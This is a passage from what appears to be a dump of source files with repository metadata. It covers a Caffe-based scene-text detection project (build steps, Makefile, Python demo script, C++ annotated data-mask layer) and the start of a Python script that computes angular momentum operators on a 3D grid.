include $CAFFE_ROOT/python to your PYTHONPATH.\n make py\n make test -j8\n # (Optional)\n make runtest -j8\n # build nms\n cd examples/text\n make\n cd ..\n ```\n3. Run the demo code. Download Model [google drive](https://docs.google.com/uc?export=download&id=0Bx8FPKhlXE1lOTF1TzIxOGhsblk), [baiduyun](https://pan.baidu.com/s/1c1ML6dM) and put it in `text/model` folder\n ```Shell\n cd examples\n sh text/download.sh\n mkdir text/result\n python text/demo_test.py\n ```\n" }, { "alpha_fraction": 0.7152777910232544, "alphanum_fraction": 0.7152777910232544, "avg_line_length": 22.83333396911621, "blob_id": "56a03e8f27780ce89feb9d6c86bd59afef988974", "content_id": "6cda83cf6ecd1911a77a32815db7319c301cefd0", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 144, "license_type": "permissive", "max_line_length": 47, "num_lines": 6, "path": "/examples/text/Makefile", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "all:\n\tpython setup.py build_ext --inplace\n\tpython ./setup.py install --record install.txt\n\trm -rf build\nclean:\n\tcat install.txt | xargs rm -rf\n\n" }, { "alpha_fraction": 0.5635493993759155, "alphanum_fraction": 0.5854553580284119, "avg_line_length": 35.408905029296875, "blob_id": "41f6f0fb350eef727dde101a596ba57ffb4b89b9", "content_id": "5ca37f3fb5964f641655f056515cb00ec68fcfb0", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8993, "license_type": "permissive", "max_line_length": 126, "num_lines": 247, "path": "/examples/text/demo_test.py", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib\nimport cv2\nimport glob\nimport shutil\nimport time\nimport sys\nimport os.path as osp\nfrom matplotlib.patches import Polygon\nfrom threading import Thread, Lock\nfrom Queue import Queue\nimport threading\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n# Add lib to PYTHONPATH\nthis_dir = osp.dirname(__file__)\nlib_path = osp.join(this_dir, 'text')\nadd_path(lib_path)\nfrom nms.gpu_nms import gpu_nms\nfrom nms.cpu_nms import cpu_nms\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (10, 10)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\ncaffe_root = '../' # this file is expected to be in {caffe_root}/examples\nimport os\nos.chdir(caffe_root)\nimport sys\nsys.path.insert(0, 'python')\nimport caffe\n\nfrom google.protobuf import text_format\nfrom caffe.proto import caffe_pb2\n\n\ndef nms(dets, thresh, force_cpu=False, device_id=2):\n \"\"\"Dispatch to either CPU or GPU NMS implementations.\"\"\"\n if dets.shape[0] == 0:\n return []\n if force_cpu:\n return cpu_nms(dets, thresh)\n else:\n return gpu_nms(dets, thresh, device_id=device_id)\n\ndef xcycwh_angle_to_x1y1x2y2x3y3x4y4(box, scale=[1,1]):\n xc, yc, width, height, radians = box\n x0 = -0.5*width\n x1 = 0.5*width\n y0 = -0.5*height\n y1 = 0.5*height\n cos_radians = math.cos(radians)\n sin_radians = math.sin(radians)\n x0_r = scale[0]*(cos_radians*x0 - sin_radians*y0 + xc)\n x1_r = scale[0]*(cos_radians*x1 - sin_radians*y0 + xc)\n x2_r = scale[0]*(cos_radians*x1 - sin_radians*y1 + xc)\n x3_r = scale[0]*(cos_radians*x0 - sin_radians*y1 + xc)\n\n y0_r = scale[1]*(sin_radians*x0 + cos_radians*y0 + yc)\n y1_r = scale[1]*(sin_radians*x1 + cos_radians*y0 + yc)\n y2_r = scale[1]*(sin_radians*x1 + cos_radians*y1 + yc)\n y3_r = scale[1]*(sin_radians*x0 + cos_radians*y1 + yc)\n\n return [x0_r, x1_r, x2_r, x3_r, y0_r, y1_r, y2_r, y3_r]\n\ndef clip(x, min_value=0, max_value=float('inf')):\n return int(np.clip(x, min_value, max_value))\n\nimport os\ncwd = os.getcwd()\nprint cwd\nimages = glob.glob(\"./examples/text/result/*.jpg\")\nresults = glob.glob(\"./examples/text/result/*.txt\")\nremoves = images + results\n\nfor f in removes:\n os.remove(f)\n\n# load PASCAL VOC labels\nlabelmap_file = \"./examples/text/labelmap_text.prototxt\"\nfile = open(labelmap_file, 'r')\nlabelmap = caffe_pb2.LabelMap()\ntext_format.Merge(str(file.read()), labelmap)\n\ndef get_labelname(labelmap, labels):\n num_labels = len(labelmap.item)\n labelnames = []\n if type(labels) is not list:\n labels = [labels]\n for label in labels:\n found = False\n for i in xrange(0, num_labels):\n if label == labelmap.item[i].label:\n found = True\n labelnames.append(labelmap.item[i].display_name)\n break\n assert found == True\n return labelnames\n\nimage_dir = './examples/text/images'\nimage_list = glob.glob('{}/*.*'.format(image_dir))\nimage_list = sorted(image_list)\n\nimage_resizes = [512 + 128 +64]\nthreshold = 0.6\nnets = []\ndevice_id = 0\nfor image_resize in image_resizes:\n model_def = './examples/text/model/deploy.prototxt'\n model_weights = './examples/text/model/demo.caffemodel'\n model_modify = './examples/text/model/final_deploy.prototxt'\n lookup = 'step:'\n\n true_steps = [' step: {}'.format(2**(2+i)) for i in range(1,5)]\n for i in range(1,4):\n step = image_resize / (image_resize / 64.0 - 2*i)\n true_steps.append(' step: {}'.format(step))\n print true_steps\n f = open(model_modify, 'w')\n with open(model_def, 'r') as myFile:\n i = 0\n for num, line in enumerate(myFile, 1):\n if lookup in line:\n print 'found at line:', num\n f.write(true_steps[i]+'\\r\\n')\n i = i + 1\n continue\n f.write(line)\n f.close()\n\n caffe.set_device(device_id)\n caffe.set_mode_gpu()\n nets.append(caffe.Net(model_modify, # defines the structure of the mode10\n model_weights, # contains the trained weights\n caffe.TEST)) # use test mode (e.g., don't perform dropout)\n device_id = device_id + 1\n\nt = 0\ntotal_time = 0\nfor image_path in image_list:\n try:\n image = caffe.io.load_image(image_path)\n original_shape = image.shape\n original_image = image\n except:\n break\n height, width, channels = image.shape\n im_size_min = np.min(image.shape[0:2])\n im_size_max = np.max(image.shape[0:2])\n plt.imshow(original_image)\n colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\n currentAxis = plt.gca()\n device_id = 0\n device_ids = range(len(image_resizes))\n original_images = [original_image] * len(image_resizes)\n my_queue = Queue()\n lock = Lock()\n params = zip(device_ids, image_resizes)\n for param in params:\n my_queue.put(param)\n detlist = []\n def worker():\n while True:\n global total_time\n global t\n #grabs host from queue\n id, resize = my_queue.get()\n image_resize_height = resize\n image_resize_width = resize\n caffe.set_device(id)\n caffe.set_mode_gpu()\n transformer = caffe.io.Transformer({'data': (1,3,image_resize_height,image_resize_width)})\n transformer.set_transpose('data', (2, 0, 1))\n transformer.set_mean('data', np.array([104,117,123])) # mean pixel\n transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]\n transformer.set_channel_swap('data', (2,1,0)) # the reference model has channels in BGR order instead of RGB\n image = original_image\n start = time.clock()\n nets[id].blobs['data'].reshape(1,3,image_resize_height,image_resize_width)\n transformed_image = transformer.preprocess('data', image)\n nets[id].blobs['data'].data[...] = transformed_image\n detections = nets[id].forward()['detection_out']\n total_time = total_time + (time.clock() - start)*1000.0\n t = t + 1\n print 'avearage running time ' + str(total_time/t)\n print (image_path)\n det_label = detections[0,0,:,1]\n det_conf = detections[0,0,:,2]\n det_xmin = detections[0,0,:,3]\n det_ymin = detections[0,0,:,4]\n det_xmax = detections[0,0,:,5]\n det_ymax = detections[0,0,:,6]\n # Get detections with confidence higher than threshold\n top_indices = [i for i, conf in enumerate(det_conf) if conf >= threshold]\n top_conf = det_conf[top_indices]\n top_xmin = det_xmin[top_indices]\n top_ymin = det_ymin[top_indices]\n top_xmax = det_xmax[top_indices]\n top_ymax = det_ymax[top_indices]\n for i in xrange(top_conf.shape[0]):\n xmin = int(round(top_xmin[i] * image.shape[1]))\n ymin = int(round(top_ymin[i] * image.shape[0]))\n xmax = int(round(top_xmax[i] * image.shape[1]))\n ymax = int(round(top_ymax[i] * image.shape[0]))\n score = top_conf[i]\n\n xmin = max(0, int(round(top_xmin[i] * original_shape[1])))\n ymin = max(0, int(round(top_ymin[i] * original_shape[0])))\n xmax = min(original_shape[1]-1, int(round(top_xmax[i] * original_shape[1])))\n ymax = min(original_shape[0]-1, int(round(top_ymax[i] * original_shape[0])))\n coords = (xmin, ymin), xmax-xmin+1, ymax-ymin+1\n\n try:\n assert xmin <= xmax and ymin <= ymax, 'left must less than right'\n except:\n continue\n lock.acquire()\n detlist.append([xmin, ymin, xmax, ymax, score])\n lock.release()\n my_queue.task_done()\n\n for j in xrange(10):\n a = Thread(target=worker)\n a.daemon = True\n a.start()\n my_queue.join()\n\n image_name = os.path.splitext(os.path.basename(image_path))[0]\n fp = open('./examples/text/result/res_{}.txt'.format(image_name),'w')\n if len(detlist) != 0:\n dets = np.array(detlist).astype(np.float32)\n #keep = nms(dets, 0.1)\n #dets = dets[keep, :]\n for j in range(dets.shape[0]):\n xmin, ymin, xmax, ymax, score = dets[j,:]\n color = colors[1]\n display_txt = '%.2f'%(score)\n coords = (xmin, ymin), xmax-xmin+1, ymax-ymin+1\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor='green', linewidth=2))\n currentAxis.text(xmin, ymin, display_txt)\n fp.write('{},{},{},{}\\r\\n'.format(int(xmin), int(ymin), int(xmax), int(ymax)))\n\n plt.savefig('./examples/text/result/{}'.format(os.path.basename(image_path)))\n plt.close()\n fp.close()\n" }, { "alpha_fraction": 0.5909682512283325, "alphanum_fraction": 0.5970197916030884, "avg_line_length": 38.00507736206055, "blob_id": "ef1c414fa1899c36171e1d27e691d1263b041d21", "content_id": "4b6839b0bfb301a163fcdbc15d7452f122930a0a", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15368, "license_type": "permissive", "max_line_length": 117, "num_lines": 394, "path": "/src/caffe/layers/annotated_data_mask_layer.cpp", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "#ifdef USE_OPENCV\n#include <opencv2/core/core.hpp>\n#endif // USE_OPENCV\n#include <stdint.h>\n\n#include <algorithm>\n#include <map>\n#include <vector>\n#include <iostream>\n#include \"caffe/data_transformer.hpp\"\n#include \"caffe/layers/annotated_data_mask_layer.hpp\"\n#include \"caffe/util/benchmark.hpp\"\n#include \"caffe/util/sampler.hpp\"\n\n\n\nnamespace caffe {\n\ntemplate <typename Dtype>\nAnnotatedDataMaskLayer<Dtype>::AnnotatedDataMaskLayer(const LayerParameter& param)\n : BaseDataMaskLayer<Dtype>(param),\n prefetch_free_(), prefetch_full_(),\n reader_(param){\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_free_.push(&prefetch_[i]);\n }\n DLOG(INFO) << \"Construtor completed\";\n}\n\ntemplate <typename Dtype>\nAnnotatedDataMaskLayer<Dtype>::~AnnotatedDataMaskLayer() {\n this->StopInternalThread();\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::DataLayerSetUp(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n const int batch_size = this->layer_param_.data_param().batch_size();\n const AnnotatedDataParameter& anno_data_param =\n this->layer_param_.annotated_data_param();\n oriented_ = anno_data_param.oriented();\n for (int i = 0; i < anno_data_param.batch_sampler_size(); ++i) {\n batch_samplers_.push_back(anno_data_param.batch_sampler(i));\n }\n label_map_file_ = anno_data_param.label_map_file();\n\n // Read a data point, and use it to initialize the top blob.\n AnnotatedMaskDatum& anno_datum = *(reader_.full().peek());\n // Use data_transformer to infer the expected blob shape from anno_datum.\n vector<int> data_shape =\n this->data_transformer_->InferBlobShape(anno_datum.datum());\n this->transformed_data_.Reshape(data_shape);\n // Reshape top[0] and prefetch_data according to the batch_size.\n data_shape[0] = batch_size;\n top[0]->Reshape(data_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].data_.Reshape(data_shape);\n }\n LOG(INFO) << \"output data size: \" << top[0]->num() << \",\"\n << top[0]->channels() << \",\" << top[0]->height() << \",\"\n << top[0]->width();\n // label\n if (this->output_labels_) {\n vector<int> mask_shape =\n this->data_transformer_->InferBlobShape(anno_datum.mask());\n this->transformed_mask_.Reshape(mask_shape);\n // Reshape top[0] and prefetch_data according to the batch_size.\n mask_shape[0] = batch_size;\n top[1]->Reshape(mask_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].mask_.Reshape(mask_shape);\n }\n LOG(INFO) << \"output mask size: \" << top[1]->num() << \",\"\n << top[1]->channels() << \",\" << top[1]->height() << \",\"\n << top[1]->width();\n has_anno_type_ = anno_datum.has_type();\n vector<int> label_shape(4, 1);\n if (has_anno_type_) {\n anno_type_ = anno_datum.type();\n // Infer the label shape from anno_datum.AnnotationGroup().\n int num_bboxes = 0;\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n // Since the number of bboxes can be different for each image,\n // we store the bbox information in a specific format. In specific:\n // All bboxes are stored in one spatial plane (num and channels are 1)\n // And each row contains one and only one box in the following format:\n // [item_id, group_label, instance_id, xmin, ymin, xmax, ymax, diff]\n // Note: Refer to caffe.proto for details about group_label and\n // instance_id.\n for (int g = 0; g < anno_datum.annotation_group_size(); ++g) {\n num_bboxes += anno_datum.annotation_group(g).annotation_size();\n }\n label_shape[0] = 1;\n label_shape[1] = 1;\n // BasePrefetchingDataLayer<Dtype>::LayerSetUp() requires to call\n // cpu_data and gpu_data for consistent prefetch thread. Thus we make\n // sure there is at least one bbox.\n label_shape[2] = std::max(num_bboxes, 1);\n label_shape[3] = 8;\n if(oriented_){\n label_shape[3] = 13;\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n } else {\n label_shape[0] = batch_size;\n }\n top[2]->Reshape(label_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].label_.Reshape(label_shape);\n }\n }\n}\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::LayerSetUp(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n BaseDataMaskLayer<Dtype>::LayerSetUp(bottom, top);\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_[i].data_.mutable_cpu_data();\n if (this->output_labels_) {\n prefetch_[i].mask_.mutable_cpu_data();\n prefetch_[i].label_.mutable_cpu_data();\n }\n }\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_[i].data_.mutable_gpu_data();\n if (this->output_labels_) {\n prefetch_[i].mask_.mutable_gpu_data();\n prefetch_[i].label_.mutable_gpu_data();\n }\n }\n }\n#endif\n DLOG(INFO) << \"Initializing prefetch\";\n this->data_transformer_->InitRand();\n this->mask_transformer_->InitRand();\n StartInternalThread();\n DLOG(INFO) << \"Prefetch initialized.\";\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::InternalThreadEntry() {\n#ifndef CPU_ONLY\n cudaStream_t stream;\n if (Caffe::mode() == Caffe::GPU) {\n CUDA_CHECK(cudaStreamCreateWithFlags(&stream, cudaStreamNonBlocking));\n }\n#endif\n try{\n while (!must_stop()) {\n BatchMask<Dtype>* batch = prefetch_free_.pop();\n load_batch(batch);\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n batch->data_.data().get()->async_gpu_push(stream);\n CUDA_CHECK(cudaStreamSynchronize(stream));\n }\n#endif\n prefetch_full_.push(batch);\n }\n } catch (boost::thread_interrupted&) {\n // Interrupted exception is expected on shutdown\n }\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n CUDA_CHECK(cudaStreamDestroy(stream));\n }\n#endif\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::Forward_cpu(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n BatchMask<Dtype>* batch = prefetch_full_.pop(\"Data layer prefetch queue empty\");\n // Reshape to loaded data.\n top[0]->ReshapeLike(batch->data_);\n // Copy the data\n caffe_copy(batch->data_.count(), batch->data_.cpu_data(),\n top[0]->mutable_cpu_data());\n DLOG(INFO) << \"Prefetch copied\";\n if (this->output_labels_) {\n // Reshape to loaded labels.\n top[1]->ReshapeLike(batch->mask_);\n top[2]->ReshapeLike(batch->label_);\n // Copy the masks and labels.\n caffe_copy(batch->mask_.count(), batch->mask_.cpu_data(),\n top[1]->mutable_cpu_data());\n caffe_copy(batch->label_.count(), batch->label_.cpu_data(),\n top[2]->mutable_cpu_data());\n }\n\n prefetch_free_.push(batch);\n}\n\n// This function is called on prefetch thread\ntemplate<typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::load_batch(BatchMask<Dtype>* batch) {\n CPUTimer batch_timer;\n batch_timer.Start();\n double read_time = 0;\n double trans_time = 0;\n CPUTimer timer;\n CHECK(batch->data_.count());\n CHECK(this->transformed_data_.count());\n CHECK(this->transformed_mask_.count());\n\n // Reshape according to the first anno_datum of each batch\n // on single input batches allows for inputs of varying dimension.\n const int batch_size = this->layer_param_.data_param().batch_size();\n AnnotatedMaskDatum& anno_datum = *(reader_.full().peek());\n // Use data_transformer to infer the expected blob shape from anno_datum.\n vector<int> data_shape =\n this->data_transformer_->InferBlobShape(anno_datum.datum());\n this->transformed_data_.Reshape(data_shape);\n // Reshape batch according to the batch_size.\n data_shape[0] = batch_size;\n batch->data_.Reshape(data_shape);\n Dtype* top_data = batch->data_.mutable_cpu_data();\n Dtype* mask_data = NULL;\n Dtype* top_label = NULL; // suppress warnings about uninitialized variables\n if (this->output_labels_) {\n vector<int> mask_shape =\n this->mask_transformer_->InferBlobShape(anno_datum.mask());\n this->transformed_mask_.Reshape(mask_shape);\n mask_shape[0] = batch_size;\n batch->mask_.Reshape(mask_shape);\n mask_data = batch->mask_.mutable_cpu_data();\n }\n if (this->output_labels_ && !has_anno_type_) {\n top_label = batch->label_.mutable_cpu_data();\n }\n\n // Store transformed annotation.\n map<int, vector<AnnotationGroup> > all_anno;\n int num_bboxes = 0;\n\n for (int item_id = 0; item_id < batch_size; ++item_id) {\n timer.Start();\n // get a anno_datum\n AnnotatedMaskDatum& temp_anno_datum = *(reader_.full().pop(\"Waiting for data\"));\n AnnotatedMaskDatum anno_datum(temp_anno_datum);\n this->data_transformer_->DistortImage(temp_anno_datum.datum(),\n anno_datum.mutable_datum());\n read_time += timer.MicroSeconds();\n timer.Start();\n AnnotatedMaskDatum sampled_datum;\n if (batch_samplers_.size() > 0) {\n // Generate sampled bboxes from anno_datum.\n vector<NormalizedBBox> sampled_bboxes;\n GenerateBatchSamples(anno_datum, batch_samplers_, &sampled_bboxes);\n if (sampled_bboxes.size() > 0) {\n // Randomly pick a sampled bbox and crop the anno_datum.\n int rand_idx = caffe_rng_rand() % sampled_bboxes.size();\n this->data_transformer_->CropImage(anno_datum, sampled_bboxes[rand_idx],\n &sampled_datum, false);\n this->mask_transformer_->CropImage(anno_datum, sampled_bboxes[rand_idx],\n &sampled_datum, true);\n } else {\n sampled_datum.CopyFrom(anno_datum);\n }\n } else {\n sampled_datum.CopyFrom(anno_datum);\n }\n // Apply data transformations (mirror, scale, crop...)\n int offset = batch->data_.offset(item_id);\n this->transformed_data_.set_cpu_data(top_data + offset);\n vector<AnnotationGroup> transformed_anno_vec;\n if (this->output_labels_) {\n int offset_mask = batch->mask_.offset(item_id);\n this->transformed_mask_.set_cpu_data(mask_data + offset_mask);\n if (has_anno_type_) {\n // Make sure all data have same annotation type.\n CHECK(sampled_datum.has_type()) << \"Some datum misses AnnotationType.\";\n CHECK_EQ(anno_type_, sampled_datum.type()) <<\n \"Different AnnotationType.\";\n // Keep same mirror\n this->data_transformer_->setForceMirrorFlag(true);\n this->mask_transformer_->setForceMirrorFlag(true);\n bool do_mirror = this->data_transformer_->getMirror();\n this->data_transformer_->setMirror(do_mirror);\n this->mask_transformer_->setMirror(do_mirror);\n transformed_anno_vec.clear();\n this->data_transformer_->Transform(sampled_datum,\n &(this->transformed_data_),\n &transformed_anno_vec, false);\n transformed_anno_vec.clear();\n this->mask_transformer_->Transform(sampled_datum,\n &(this->transformed_mask_),\n &transformed_anno_vec, true);\n // vector<int> shape2 =\n // this->data_transformer_->InferBlobShape(sampled_datum.mask());\n //std::cout << \"mask \" << shape2[0] << \" \" << shape2[1] << \" \" << shape2[2] << \" \" << shape2[3] << std::endl;\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n // Count the number of bboxes.\n for (int g = 0; g < transformed_anno_vec.size(); ++g) {\n num_bboxes += transformed_anno_vec[g].annotation_size();\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n all_anno[item_id] = transformed_anno_vec;\n } else {\n this->data_transformer_->Transform(sampled_datum.datum(),\n &(this->transformed_data_));\n // Otherwise, store the label from datum.\n CHECK(sampled_datum.datum().has_label()) << \"Cannot find any label.\";\n top_label[item_id] = sampled_datum.datum().label();\n }\n } else {\n this->data_transformer_->Transform(sampled_datum.datum(),\n &(this->transformed_data_));\n }\n trans_time += timer.MicroSeconds();\n\n reader_.free().push(const_cast<AnnotatedMaskDatum*>(&temp_anno_datum));\n }\n // Store \"rich\" annotation if needed.\n int shape_annotation = 8;\n if(oriented_){\n shape_annotation = 13;\n }\n if (this->output_labels_ && has_anno_type_) {\n vector<int> label_shape(4);\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n label_shape[0] = 1;\n label_shape[1] = 1;\n label_shape[3] = shape_annotation;\n if (num_bboxes == 0) {\n // Store all -1 in the label.\n label_shape[2] = 1;\n batch->label_.Reshape(label_shape);\n caffe_set<Dtype>(shape_annotation, -1, batch->label_.mutable_cpu_data());\n } else {\n // Reshape the label and store the annotation.\n label_shape[2] = num_bboxes;\n batch->label_.Reshape(label_shape);\n top_label = batch->label_.mutable_cpu_data();\n int idx = 0;\n for (int item_id = 0; item_id < batch_size; ++item_id) {\n const vector<AnnotationGroup>& anno_vec = all_anno[item_id];\n for (int g = 0; g < anno_vec.size(); ++g) {\n const AnnotationGroup& anno_group = anno_vec[g];\n for (int a = 0; a < anno_group.annotation_size(); ++a) {\n const Annotation& anno = anno_group.annotation(a);\n const NormalizedBBox& bbox = anno.bbox();\n top_label[idx++] = item_id;\n top_label[idx++] = anno_group.group_label();\n top_label[idx++] = anno.instance_id();\n top_label[idx++] = bbox.xmin();\n top_label[idx++] = bbox.ymin();\n top_label[idx++] = bbox.xmax();\n top_label[idx++] = bbox.ymax();\n top_label[idx++] = bbox.difficult();\n if(shape_annotation == 13){\n const NormalizedOrientedBBox& oriented_bbox = anno.oriented_bbox();\n top_label[idx++] = oriented_bbox.xc();\n top_label[idx++] = oriented_bbox.yc();\n top_label[idx++] = oriented_bbox.width();\n top_label[idx++] = oriented_bbox.height();\n top_label[idx++] = oriented_bbox.radians();\n // std::cout << oriented_bbox.xc() << \" \"\n // << oriented_bbox.yc() << \" \"\n // << oriented_bbox.width() << \" \"\n // << oriented_bbox.height() << \" \"\n // << oriented_bbox.radians() << \"\"\n // << std::endl;\n }\n }\n }\n }\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n }\n timer.Stop();\n batch_timer.Stop();\n DLOG(INFO) << \"Prefetch batch: \" << batch_timer.MilliSeconds() << \" ms.\";\n DLOG(INFO) << \" Read time: \" << read_time / 1000 << \" ms.\";\n DLOG(INFO) << \"Transform time: \" << trans_time / 1000 << \" ms.\";\n\n}\n\n#ifdef CPU_ONLY\nSTUB_GPU_FORWARD(AnnotatedDataMaskLayer, Forward);\n#endif\n\nINSTANTIATE_CLASS(AnnotatedDataMaskLayer);\nREGISTER_LAYER_CLASS(AnnotatedDataMask);\n\n} // namespace caffe\n" } ]
4
zhang19960128/qmhwangularmomentum
https://github.com/zhang19960128/qmhwangularmomentum
0a4814268a2204e74c61ca3bb0054635fe1db4e9
4fd1b82d4f9bc33c0b286ab1bcd0bc0563c2344a
3e577a8d7987ee3969922585bf0a855789b8b39d
refs/heads/master
2021-08-14T20:10:31.959425
2017-11-16T17:18:42
2017-11-16T17:18:42
111,000,191
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8382353186607361, "alphanum_fraction": 0.8382353186607361, "avg_line_length": 67, "blob_id": "9978863a1f6673ae6f4eaa32af4d546373505457", "content_id": "2af8a6be350f12a90b12d0f4bee1ac9cdef3b6de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 68, "license_type": "no_license", "max_line_length": 67, "num_lines": 1, "path": "/README.md", "repo_name": "zhang19960128/qmhwangularmomentum", "src_encoding": "UTF-8", "text": "this is the numerical code and analytical code for angular momentum\n" }, { "alpha_fraction": 0.5548844337463379, "alphanum_fraction": 0.595588207244873, "avg_line_length": 34.588783264160156, "blob_id": "ef6d5b4503908acaf3ee6481f9081544a87f0724", "content_id": "c1bc1a6d9870cb66a8ee53ed08c7ef527aff9254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 101, "num_lines": 107, "path": "/test.py", "repo_name": "zhang19960128/qmhwangularmomentum", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 11 07:45:58 2017\n\n@author: jiahaozhang\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport cmath\ndef dis(x,y,z):\n return math.sqrt(x**2+y**2+z**2);\ndef px(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid-1,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i+1,j,k]-phi[i,j,k])/dx;\n return re;\ndef py(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid,1):\n for j in range(0,ngrid-1,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i,j+1,k]-phi[i,j,k])/dy;\n return re;\ndef pz(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid-1,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i,j,k+1]-phi[i,j,k])/dy;\n return re;\ndef xop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n xscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=xscope[i]*phi[i,j,k];\n return re;\ndef yop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n yscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=yscope[j]*phi[i,j,k];\n return re;\ndef zop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n zscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=zscope[k]*phi[i,j,k];\n return re;\ndef innerprod(phi1,phi2):\n return np.vdot(np.conjugate(phi1.reshape((ngrid**3,1,1))),phi2.reshape((ngrid**3,1,1)))*dx*dy*dz;\nngrid=500;\nscope=5;\nxgrid=np.linspace(-1*scope,scope,ngrid);\ndx=xgrid[2]-xgrid[1];\nygrid=np.linspace(-1*scope,scope,ngrid);\ndy=ygrid[2]-ygrid[1];\nzgrid=np.linspace(-1*scope,scope,ngrid);\ndz=zgrid[2]-zgrid[1];\nphiall=np.zeros((4,ngrid,ngrid,ngrid),dtype='complex');\nfor i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n phiall[0,i,j,k]=math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2);\n phiall[1,i,j,k]=xgrid[i]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2);\n phiall[2,i,j,k]=ygrid[j]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2); \n phiall[3,i,j,k]=zgrid[k]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2); \nco1=math.sqrt(1/np.sum(np.power(np.reshape(phiall[0],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco2=math.sqrt(1/np.sum(np.power(np.reshape(phiall[1],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco3=math.sqrt(1/np.sum(np.power(np.reshape(phiall[2],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco4=math.sqrt(1/np.sum(np.power(np.reshape(phiall[3],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nphiall[0]=co1*phiall[0];\nphiall[1]=co2*phiall[1];\nphiall[2]=co3*phiall[2];\nphiall[3]=co4*phiall[3];\nlz=np.zeros((4,4),dtype='complex');\nlx=np.zeros((4,4),dtype='complex');\nly=np.zeros((4,4),dtype='complex');\nfor i in range(4):\n for j in range(4):\n print(\"get one\")\n 